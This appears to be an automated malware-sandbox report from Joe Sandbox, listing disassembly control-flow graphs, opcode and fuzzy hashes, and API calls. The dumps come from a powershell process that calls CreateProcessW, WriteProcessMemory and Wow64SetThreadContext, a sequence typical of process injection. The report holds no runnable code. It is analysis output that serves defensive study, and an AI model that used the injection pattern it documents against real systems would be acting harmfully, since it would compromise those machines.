                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000A.00000002.1726661851.0000000004D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D00000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_10_2_4d00000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 3968b2cbda2bdac7d19ecaeee32a61a31515d6e09d9253795b1819c0857ff212
                                                                                                        • Instruction ID: b63476e0a4e687657ef0bffc9d6994191b27d575ea91ef23ccab3406ec23cbaf
                                                                                                        • Opcode Fuzzy Hash: 3968b2cbda2bdac7d19ecaeee32a61a31515d6e09d9253795b1819c0857ff212
                                                                                                        • Instruction Fuzzy Hash: 27027E70A003188FEB20CB65CC54B9ABBB6BF95344F14C1A9E948AB3D1DB75AD84CF51

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 397 4d08708-4d0a441 399 4d0a443-4d0a446 397->399 400 4d0a449-4d0a450 397->400 399->400 401 4d0a452-4d0a458 400->401 402 4d0a45b-4d0a471 400->402 401->402 403 4d0a473-4d0a479 402->403 404 4d0a47c-4d0a51f CreateProcessW 402->404 403->404 406 4d0a521-4d0a527 404->406 407 4d0a528-4d0a5a0 404->407 406->407 414 4d0a5b2-4d0a5b9 407->414 415 4d0a5a2-4d0a5a8 407->415 416 4d0a5d0 414->416 417 4d0a5bb-4d0a5ca 414->417 415->414 418 4d0a5d1 416->418 417->416 418->418
                                                                                                        APIs
                                                                                                        • CreateProcessW.KERNELBASE(00000000,?,00000009,?,?,?,?,?,?,?), ref: 04D0A50C
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000A.00000002.1726661851.0000000004D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D00000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_10_2_4d00000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CreateProcess
                                                                                                        • String ID:
                                                                                                        • API String ID: 963392458-0
                                                                                                        • Opcode ID: bfc8ac47e2eb3388d236a9065bd050e24ce436a164f7208512da0fe8ee0b9ade
                                                                                                        • Instruction ID: 00b2822d7c0420d26b480e543d05faa2e81f2f60855aa8ca56abc4079dde6f58
                                                                                                        • Opcode Fuzzy Hash: bfc8ac47e2eb3388d236a9065bd050e24ce436a164f7208512da0fe8ee0b9ade
                                                                                                        • Instruction Fuzzy Hash: 4F511871901369DFEB24CF99C844BDEBBB5BF48314F1084AAE909B7250D771AA84CF50

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 420 4d0aa90-4d0aade 422 4d0aae0-4d0aae6 420->422 423 4d0aae8-4d0ab21 WriteProcessMemory 420->423 422->423 424 4d0ab23-4d0ab29 423->424 425 4d0ab2a-4d0ab4b 423->425 424->425
                                                                                                        APIs
                                                                                                        • WriteProcessMemory.KERNELBASE(?,00000000,00000000,18B52514,00000000,?,?,?,00000000,00000000,?,04D09F87,?,00000000,?), ref: 04D0AB14
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000A.00000002.1726661851.0000000004D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D00000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_10_2_4d00000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: MemoryProcessWrite
                                                                                                        • String ID:
                                                                                                        • API String ID: 3559483778-0
                                                                                                        • Opcode ID: 773af6e5beef69b434092560c4372d48b610a0a8fa2f50ac6da09da0b80cbb53
                                                                                                        • Instruction ID: 23c5aebfd3b2510363d4ceafc91199fc05ca174bc46db38363da699f9d177b6f
                                                                                                        • Opcode Fuzzy Hash: 773af6e5beef69b434092560c4372d48b610a0a8fa2f50ac6da09da0b80cbb53
                                                                                                        • Instruction Fuzzy Hash: 4521F5B5900349DFDB10CF9AD984BDEFBF4FB48320F50842AE558A7240D378AA44CB61

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 427 4d0872c-4d0aade 429 4d0aae0-4d0aae6 427->429 430 4d0aae8-4d0ab21 WriteProcessMemory 427->430 429->430 431 4d0ab23-4d0ab29 430->431 432 4d0ab2a-4d0ab4b 430->432 431->432
                                                                                                        APIs
                                                                                                        • WriteProcessMemory.KERNELBASE(?,00000000,00000000,18B52514,00000000,?,?,?,00000000,00000000,?,04D09F87,?,00000000,?), ref: 04D0AB14
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000A.00000002.1726661851.0000000004D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D00000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_10_2_4d00000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: MemoryProcessWrite
                                                                                                        • String ID:
                                                                                                        • API String ID: 3559483778-0
                                                                                                        • Opcode ID: e9cb3b92e9ac23619b0c9274e30b273071b40b9f4e31516985b4d26c584822e1
                                                                                                        • Instruction ID: af46135d3f6f10a35bc12ed2fb5253410ffeb4b15d0d011b824f694fa590e709
                                                                                                        • Opcode Fuzzy Hash: e9cb3b92e9ac23619b0c9274e30b273071b40b9f4e31516985b4d26c584822e1
                                                                                                        • Instruction Fuzzy Hash: C32104B5900309DFDB10CF9AC984BDEBBF4FB08320F10802AE958A7340D378A944CBA5

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 434 4d0a601-4d0a648 436 4d0a654-4d0a680 Wow64SetThreadContext 434->436 437 4d0a64a-4d0a652 434->437 438 4d0a682-4d0a688 436->438 439 4d0a689-4d0a6aa 436->439 437->436 438->439
                                                                                                        APIs
                                                                                                        • Wow64SetThreadContext.KERNEL32(?,00000000,?,?,?,?,00000000,?,?,?,04D09D3B), ref: 04D0A673
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000A.00000002.1726661851.0000000004D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D00000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_10_2_4d00000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ContextThreadWow64
                                                                                                        • String ID:
                                                                                                        • API String ID: 983334009-0
                                                                                                        • Opcode ID: af19dc04021cb6e9dfb58c04d4168bc52b7d2bb31c5f85be5bbb7f077ac52db8
                                                                                                        • Instruction ID: aee968ea4ca53848b44bc637ed38c5350ad5cfc85556b854201be1520bb72488
                                                                                                        • Opcode Fuzzy Hash: af19dc04021cb6e9dfb58c04d4168bc52b7d2bb31c5f85be5bbb7f077ac52db8
                                                                                                        • Instruction Fuzzy Hash: E92129B59007498FDB10CF9AC844BDEFBF4EB48320F14806AD458A3340D778A545CFA5

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 441 4d08714-4d0a648 443 4d0a654-4d0a680 Wow64SetThreadContext 441->443 444 4d0a64a-4d0a652 441->444 445 4d0a682-4d0a688 443->445 446 4d0a689-4d0a6aa 443->446 444->443 445->446
                                                                                                        APIs
                                                                                                        • Wow64SetThreadContext.KERNEL32(?,00000000,?,?,?,?,00000000,?,?,?,04D09D3B), ref: 04D0A673
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000A.00000002.1726661851.0000000004D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D00000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_10_2_4d00000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ContextThreadWow64
                                                                                                        • String ID:
                                                                                                        • API String ID: 983334009-0
                                                                                                        • Opcode ID: 20e30f5cdd711017f8a99be6291db2408abfedf05a2ddf8f981c6990188425b3
                                                                                                        • Instruction ID: 65cea4b8ea20d104a673d6d772e965a09e79b8d56cd241e026695f2b81117243
                                                                                                        • Opcode Fuzzy Hash: 20e30f5cdd711017f8a99be6291db2408abfedf05a2ddf8f981c6990188425b3
                                                                                                        • Instruction Fuzzy Hash: 9C1153B69007498FDB20CF9AC844BDEBBF4EB88320F54802AE458A3340D378A544CFA5

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 448 4d08738-4d0a648 450 4d0a654-4d0a680 Wow64SetThreadContext 448->450 451 4d0a64a-4d0a652 448->451 452 4d0a682-4d0a688 450->452 453 4d0a689-4d0a6aa 450->453 451->450 452->453
                                                                                                        APIs
                                                                                                        • Wow64SetThreadContext.KERNEL32(?,00000000,?,?,?,?,00000000,?,?,?,04D09D3B), ref: 04D0A673
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000A.00000002.1726661851.0000000004D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D00000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_10_2_4d00000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ContextThreadWow64
                                                                                                        • String ID:
                                                                                                        • API String ID: 983334009-0
                                                                                                        • Opcode ID: cfa9f28bb0ddf65d4596a7aebc46ffc2a9cbf258ff760579e174059b37669ce1
                                                                                                        • Instruction ID: e8cad32486eafcf4de8ae213343fdc751df719f0a636df1b0bb9e0ef791fae21
                                                                                                        • Opcode Fuzzy Hash: cfa9f28bb0ddf65d4596a7aebc46ffc2a9cbf258ff760579e174059b37669ce1
                                                                                                        • Instruction Fuzzy Hash: BC1153B29007498FDB10CF9AC844BDEBBF4EB88320F55812AE458A3340D378A544CFA5
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000A.00000002.1798195318.00000000077C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077C0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_10_2_77c0000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 57aa7233d7233ae75ee49d7de202e7a3003671494cefe7aa22a90af7f854fbcb
                                                                                                        • Instruction ID: fe929b2714b99eda288cef41a74a20512b631c83bacfa734ce1bad9de5f591cb
                                                                                                        • Opcode Fuzzy Hash: 57aa7233d7233ae75ee49d7de202e7a3003671494cefe7aa22a90af7f854fbcb
                                                                                                        • Instruction Fuzzy Hash: E812D1B5B0430ADFDB24DF69D8447AABBA1BF89361F14C4AED415CB252DB31C841CBA1

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 1267 77c1aa8-77c1ace 1268 77c1c7a-77c1cc2 1267->1268 1269 77c1ad4-77c1ad9 1267->1269 1281 77c1cc8-77c1ccd 1268->1281 1282 77c1df4-77c1e25 1268->1282 1270 77c1adb-77c1ae1 1269->1270 1271 77c1af1-77c1af5 1269->1271 1272 77c1ae5-77c1aef 1270->1272 1273 77c1ae3 1270->1273 1275 77c1afb-77c1afd 1271->1275 1276 77c1c26-77c1c30 1271->1276 1272->1271 1273->1271 1277 77c1b0d 1275->1277 1278 77c1aff-77c1b0b 1275->1278 1279 77c1c3e-77c1c44 1276->1279 1280 77c1c32-77c1c3b 1276->1280 1283 77c1b0f-77c1b11 1277->1283 1278->1283 1284 77c1c4a-77c1c56 1279->1284 1285 77c1c46-77c1c48 1279->1285 1286 77c1ccf-77c1cd5 1281->1286 1287 77c1ce5-77c1ce9 1281->1287 1298 77c1e35 1282->1298 1299 77c1e27-77c1e33 1282->1299 1283->1276 1290 77c1b17-77c1b1b 1283->1290 1291 77c1c58-77c1c77 1284->1291 1285->1291 1292 77c1cd9-77c1ce3 1286->1292 1293 77c1cd7 1286->1293 1294 77c1cef-77c1cf1 1287->1294 1295 77c1da6-77c1db0 1287->1295 1300 77c1b1d-77c1b2c 1290->1300 1301 77c1b2e 1290->1301 1292->1287 1293->1287 1296 77c1d01 1294->1296 1297 77c1cf3-77c1cff 1294->1297 1302 77c1dbd-77c1dc3 1295->1302 1303 77c1db2-77c1dba 1295->1303 1305 77c1d03-77c1d05 1296->1305 1297->1305 1307 77c1e37-77c1e39 1298->1307 1299->1307 1308 77c1b30-77c1b32 1300->1308 1301->1308 1309 77c1dc9-77c1dd5 1302->1309 1310 77c1dc5-77c1dc7 1302->1310 1305->1295 1312 77c1d0b-77c1d0d 1305->1312 1313 77c1e3b-77c1e5a 1307->1313 1314 77c1ea7-77c1eb1 1307->1314 1308->1276 1315 77c1b38-77c1b3a 1308->1315 1316 77c1dd7-77c1df1 1309->1316 1310->1316 1317 77c1d0f-77c1d15 1312->1317 1318 77c1d27-77c1d29 1312->1318 1348 77c1e5c-77c1e68 1313->1348 1349 77c1e6a 1313->1349 1319 77c1eba-77c1ec0 1314->1319 1320 77c1eb3-77c1eb7 1314->1320 1321 77c1b3c-77c1b48 1315->1321 1322 77c1b4a 1315->1322 1325 77c1d19-77c1d25 1317->1325 1326 77c1d17 1317->1326 1332 77c1d30-77c1d32 1318->1332 1327 77c1ec6-77c1ed2 1319->1327 1328 77c1ec2-77c1ec4 1319->1328 1330 77c1b4c-77c1b4e 1321->1330 1322->1330 1325->1318 1326->1318 1333 77c1ed4-77c1ef2 1327->1333 1328->1333 1330->1276 1334 77c1b54-77c1b56 1330->1334 1335 77c1d4a-77c1da3 1332->1335 1336 77c1d34-77c1d3a 1332->1336 1339 77c1b58-77c1b5e 1334->1339 1340 77c1b70-77c1b7b 1334->1340 1345 77c1d3c 1336->1345 1346 77c1d3e-77c1d40 1336->1346 1351 77c1b60 1339->1351 1352 77c1b62-77c1b6e 1339->1352 1343 77c1b7d-77c1b80 1340->1343 1344 77c1b8a-77c1b96 1340->1344 1343->1344 1353 77c1b98-77c1b9a 1344->1353 1354 77c1ba4-77c1bb4 1344->1354 1345->1335 1346->1335 1355 77c1e6c-77c1e6e 1348->1355 1349->1355 1351->1340 1352->1340 1353->1354 1361 77c1bcc-77c1c23 1354->1361 1362 77c1bb6-77c1bbc 1354->1362 1355->1314 1357 77c1e70-77c1e8d 1355->1357 1363 77c1e8f-77c1ea1 1357->1363 1364 77c1ef5-77c1efa 1357->1364 1365 77c1bbe 1362->1365 1366 77c1bc0-77c1bc2 1362->1366 1363->1314 1364->1363 1365->1361 1366->1361
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000A.00000002.1798195318.00000000077C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077C0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_10_2_77c0000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: c1da72ce7de488e4904cf4eb4b8be2f45476dc29778ab31658fc1a1641b51675
                                                                                                        • Instruction ID: 4cf846677a508fd731c3f671be2c09706f39bb6f057e54eeabdbeaa4ae9a4f21
                                                                                                        • Opcode Fuzzy Hash: c1da72ce7de488e4904cf4eb4b8be2f45476dc29778ab31658fc1a1641b51675
                                                                                                        • Instruction Fuzzy Hash: F6B107F571430EDFDB25CA69D4107AABBA5AF8A391F6484BFD805CB242DB31C841C7A1

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 1369 77c0458-77c047b 1370 77c0656-77c069b 1369->1370 1371 77c0481-77c0486 1369->1371 1379 77c06a1-77c06a6 1370->1379 1380 77c07f2-77c0822 1370->1380 1372 77c049e-77c04a2 1371->1372 1373 77c0488-77c048e 1371->1373 1377 77c04a8-77c04ac 1372->1377 1378 77c0603-77c060d 1372->1378 1375 77c0490 1373->1375 1376 77c0492-77c049c 1373->1376 1375->1372 1376->1372 1383 77c04ae-77c04bd 1377->1383 1384 77c04bf 1377->1384 1381 77c060f-77c0618 1378->1381 1382 77c061b-77c0621 1378->1382 1385 77c06be-77c06c2 1379->1385 1386 77c06a8-77c06ae 1379->1386 1407 77c0824-77c0829 1380->1407 1408 77c0855-77c0867 1380->1408 1388 77c0627-77c0633 1382->1388 1389 77c0623-77c0625 1382->1389 1390 77c04c1-77c04c3 1383->1390 1384->1390 1393 77c079f-77c07a9 1385->1393 1394 77c06c8-77c06ca 1385->1394 1391 77c06b0 1386->1391 1392 77c06b2-77c06bc 1386->1392 1395 77c0635-77c0653 1388->1395 1389->1395 1390->1378 1397 77c04c9-77c04e9 1390->1397 1391->1385 1392->1385 1402 77c07ab-77c07b4 1393->1402 1403 77c07b7-77c07bd 1393->1403 1398 77c06cc-77c06d8 1394->1398 1399 77c06da 1394->1399 1424 77c0508 1397->1424 1425 77c04eb-77c0506 1397->1425 1405 77c06dc-77c06de 1398->1405 1399->1405 1410 77c07bf-77c07c1 1403->1410 1411 77c07c3-77c07cf 1403->1411 1405->1393 1413 77c06e4-77c06e8 1405->1413 1414 77c082b-77c0831 1407->1414 1415 77c0841-77c0852 1407->1415 1412 77c07d1-77c07ef 1410->1412 1411->1412 1418 77c0708 1413->1418 1419 77c06ea-77c0706 1413->1419 1421 77c0835-77c083f 1414->1421 1422 77c0833 1414->1422 1426 77c070a-77c070c 1418->1426 1419->1426 1421->1415 1422->1415 1431 77c050a-77c050c 1424->1431 1425->1431 1426->1393 1429 77c0712-77c072d 1426->1429 1445 77c072f-77c0735 1429->1445 1446 77c0745-77c079c 1429->1446 1431->1378 1435 77c0512-77c0514 1431->1435 1438 77c0524 1435->1438 1439 77c0516-77c0522 1435->1439 1442 77c0526-77c0528 1438->1442 1439->1442 1442->1378 1444 77c052e-77c054e 1442->1444 1452 77c0566-77c056a 1444->1452 1453 77c0550-77c0556 1444->1453 1447 77c0739-77c073b 1445->1447 1448 77c0737 1445->1448 1447->1446 1448->1446 1456 77c056c-77c0572 1452->1456 1457 77c0584-77c0588 1452->1457 1454 77c0558 1453->1454 1455 77c055a-77c055c 1453->1455 1454->1452 1455->1452 1458 77c0574 1456->1458 1459 77c0576-77c0582 1456->1459 1460 77c058f-77c0591 1457->1460 1458->1457 1459->1457 1462 77c05a9-77c0600 1460->1462 1463 77c0593-77c0599 1460->1463 1465 77c059d-77c059f 1463->1465 1466 77c059b 1463->1466 1465->1462 1466->1462
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000A.00000002.1798195318.00000000077C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077C0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_10_2_77c0000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 767981358d423e74dd0cb567eb9a37ac97e665de7e67ce1aa384f4ccceea8ce0
                                                                                                        • Instruction ID: 3fea02b6bd3e6ee0b8e29edebd0e910142281a07e15f6b550daf2ccfea26f45a
                                                                                                        • Opcode Fuzzy Hash: 767981358d423e74dd0cb567eb9a37ac97e665de7e67ce1aa384f4ccceea8ce0
                                                                                                        • Instruction Fuzzy Hash: 5EA133B5B10206CFDB24DE69DC10BAAB7A5AFC9394F24C46ED419DB281DB31C941CBE1

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 1467 77c1f18-77c1f47 1468 77c1f5f-77c1f97 1467->1468 1469 77c1f49-77c1f4f 1467->1469 1475 77c1f9e-77c1fb2 1468->1475 1470 77c1f51 1469->1470 1471 77c1f53-77c1f5d 1469->1471 1470->1468 1471->1468 1476 77c1fdb-77c1fe2 1475->1476 1477 77c1fb4-77c1fd3 1475->1477 1478 77c1fe8-77c1fed 1476->1478 1479 77c208b-77c20b8 1476->1479 1477->1476 1481 77c1fef-77c1ff5 1478->1481 1482 77c2005-77c2011 1478->1482 1499 77c20bd-77c20d1 1479->1499 1485 77c1ff9-77c2003 1481->1485 1486 77c1ff7 1481->1486 1482->1479 1483 77c2013-77c202e 1482->1483 1490 77c2048-77c2089 1483->1490 1491 77c2030-77c2036 1483->1491 1485->1482 1486->1482 1490->1499 1492 77c2038 1491->1492 1493 77c203a-77c2046 1491->1493 1492->1490 1493->1490 1500 77c20fa-77c2132 1499->1500 1501 77c20d3-77c20f2 1499->1501 1507 77c2133 1500->1507 1501->1500 1507->1507
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000A.00000002.1798195318.00000000077C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077C0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_10_2_77c0000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 4b57653c04e2f848cf75da69d91ee2a299545f2ec44e8b5d4e4b39ef8373bd9b
                                                                                                        • Instruction ID: 36821cc524bd762c288b760b32e67322383cd76ff45b6758aaba1c44053dd5bb
                                                                                                        • Opcode Fuzzy Hash: 4b57653c04e2f848cf75da69d91ee2a299545f2ec44e8b5d4e4b39ef8373bd9b
                                                                                                        • Instruction Fuzzy Hash: FD516CB4A102098BEB04DB58C580B9EB7F2BF8D314F25846AD9056F352CBB6DD81CB91
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000A.00000002.1798195318.00000000077C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077C0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_10_2_77c0000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: b895ab56589ad00f2cd29580cf50bcbd0ab6ec2640b0f867bac52807b96de8cf
                                                                                                        • Instruction ID: b0192a2860dcf53639709c325a7b321693c4b2ad41f3dd830b27d159e9a3bc3b
                                                                                                        • Opcode Fuzzy Hash: b895ab56589ad00f2cd29580cf50bcbd0ab6ec2640b0f867bac52807b96de8cf
                                                                                                        • Instruction Fuzzy Hash: 1751D271705345DFD721CB68CC54B6ABBB2AF8A314F18C49ED5899F292C631DC42C7A1
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000A.00000002.1798195318.00000000077C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077C0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_10_2_77c0000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: d3d9c8eeb643735717757ca7ebde78c75f99114038524ddf27a1ef179daf9737
                                                                                                        • Instruction ID: b2665f0ee7767dcd272309d8f2a3018eaf5ff1fddfdf7a783a2f5bde624b6806
                                                                                                        • Opcode Fuzzy Hash: d3d9c8eeb643735717757ca7ebde78c75f99114038524ddf27a1ef179daf9737
                                                                                                        • Instruction Fuzzy Hash: E0517CB4600209DFEB00DB58C594B9ABBF2BF8D354F1584AED8056B352CB76ED81CB51
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000A.00000002.1798195318.00000000077C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077C0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_10_2_77c0000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: f44b11d8905a5854a6fb8e6e4b22287c7d15167fd68417b86423a910f44d293b
                                                                                                        • Instruction ID: 6cfe5448caa4d0590b5afeb9b8412925030bd6ab3287cc742c62284c7a8ee2cf
                                                                                                        • Opcode Fuzzy Hash: f44b11d8905a5854a6fb8e6e4b22287c7d15167fd68417b86423a910f44d293b
                                                                                                        • Instruction Fuzzy Hash: 32411871B01318EFDB24DB648C10BAA7BE5AF89750F24845EE505AF381CAB1DC40C3E2
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000A.00000002.1798195318.00000000077C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077C0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_10_2_77c0000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 870f9b8c74c7c44216a771d623e0412b0b1c61533fcddb8c483b821d53b7e7ff
                                                                                                        • Instruction ID: 3cab339180702152d4d0d60c1dd5a954de765749072cd308a1bd903530f8caa8
                                                                                                        • Opcode Fuzzy Hash: 870f9b8c74c7c44216a771d623e0412b0b1c61533fcddb8c483b821d53b7e7ff
                                                                                                        • Instruction Fuzzy Hash: 653107F0710316DFDB24CE659C00B6A77A8AF4A394F14846ED904DB291E735C940C7E1
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000A.00000002.1798195318.00000000077C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077C0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_10_2_77c0000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 5c066a949a2c943e06ef74b5520fdcc861241a7c3d273af64eeeea466feed178
                                                                                                        • Instruction ID: 116ffbdfff0d56f89370ffc251cbd0eea08c13b8bd2047a5a14c1ccd549adeed
                                                                                                        • Opcode Fuzzy Hash: 5c066a949a2c943e06ef74b5520fdcc861241a7c3d273af64eeeea466feed178
                                                                                                        • Instruction Fuzzy Hash: F2119DF5A0434FDFCB34CA54C4006A6BBB5AF8A391F9484BFD4059B24AD731C5A1C7A1
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000A.00000002.1798195318.00000000077C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077C0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_10_2_77c0000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 5dd72bcf44949e1708fa99accabb15ca5fcbcfd2d643aba46c2bee3c28e650fa
                                                                                                        • Instruction ID: 0b758053a614c6c0e74a240e4196a453104b7d2b59f7d9655c3bb62d4bbadfce
                                                                                                        • Opcode Fuzzy Hash: 5dd72bcf44949e1708fa99accabb15ca5fcbcfd2d643aba46c2bee3c28e650fa
                                                                                                        • Instruction Fuzzy Hash: E301F5713453846FEB61A3744C21BAE3BA59F87744F60840BE505DF2C2D8A99C808377
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000A.00000002.1725365779.000000000320D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0320D000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_10_2_320d000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 53d2c9991a0f04ea925e0b943d1e0343c30e325b68b1fed9a091155760361dce
                                                                                                        • Instruction ID: 0eefa12aa480034f3a5adc8c15190d8731e3aa48b498e5cc93b7c52d3af7008e
                                                                                                        • Opcode Fuzzy Hash: 53d2c9991a0f04ea925e0b943d1e0343c30e325b68b1fed9a091155760361dce
                                                                                                        • Instruction Fuzzy Hash: 2401F23151A3009FE710CBA1CE80B67FB9CDF41320F18C05AEC4C4A2C3C6B99989CAB2
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000A.00000002.1725365779.000000000320D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0320D000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_10_2_320d000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 00dc822ea66c4e37eca7c0dec5f7a633af4365955436f75822c63ff98a4d7d4c
                                                                                                        • Instruction ID: f2455135fdcb5b504254f7ab73dcdb5ba3612b6bf3aafd6c46e1e1fcce400b78
                                                                                                        • Opcode Fuzzy Hash: 00dc822ea66c4e37eca7c0dec5f7a633af4365955436f75822c63ff98a4d7d4c
                                                                                                        • Instruction Fuzzy Hash: 0B01ED7244E3C09FD7128B258994B56BFB89F43224F1D81DBD9889F1A3C2699848C772
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000A.00000002.1726661851.0000000004D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D00000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_10_2_4d00000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 496b5e674cfbae39709153e7d900312fb4c93a7ac2a5c438b2bffc6e54a2f650
                                                                                                        • Instruction ID: 9b773724c13d163957ba3e6b2621b2eb44469442ce3cb4d37c67786824977991
                                                                                                        • Opcode Fuzzy Hash: 496b5e674cfbae39709153e7d900312fb4c93a7ac2a5c438b2bffc6e54a2f650
                                                                                                        • Instruction Fuzzy Hash: 55D1D374B043549FDB199B78886477E7FB6BF89300F4488A9D486DB2C6DE38DC428792

                                                                                                        Execution Graph

                                                                                                        Execution Coverage:1.4%
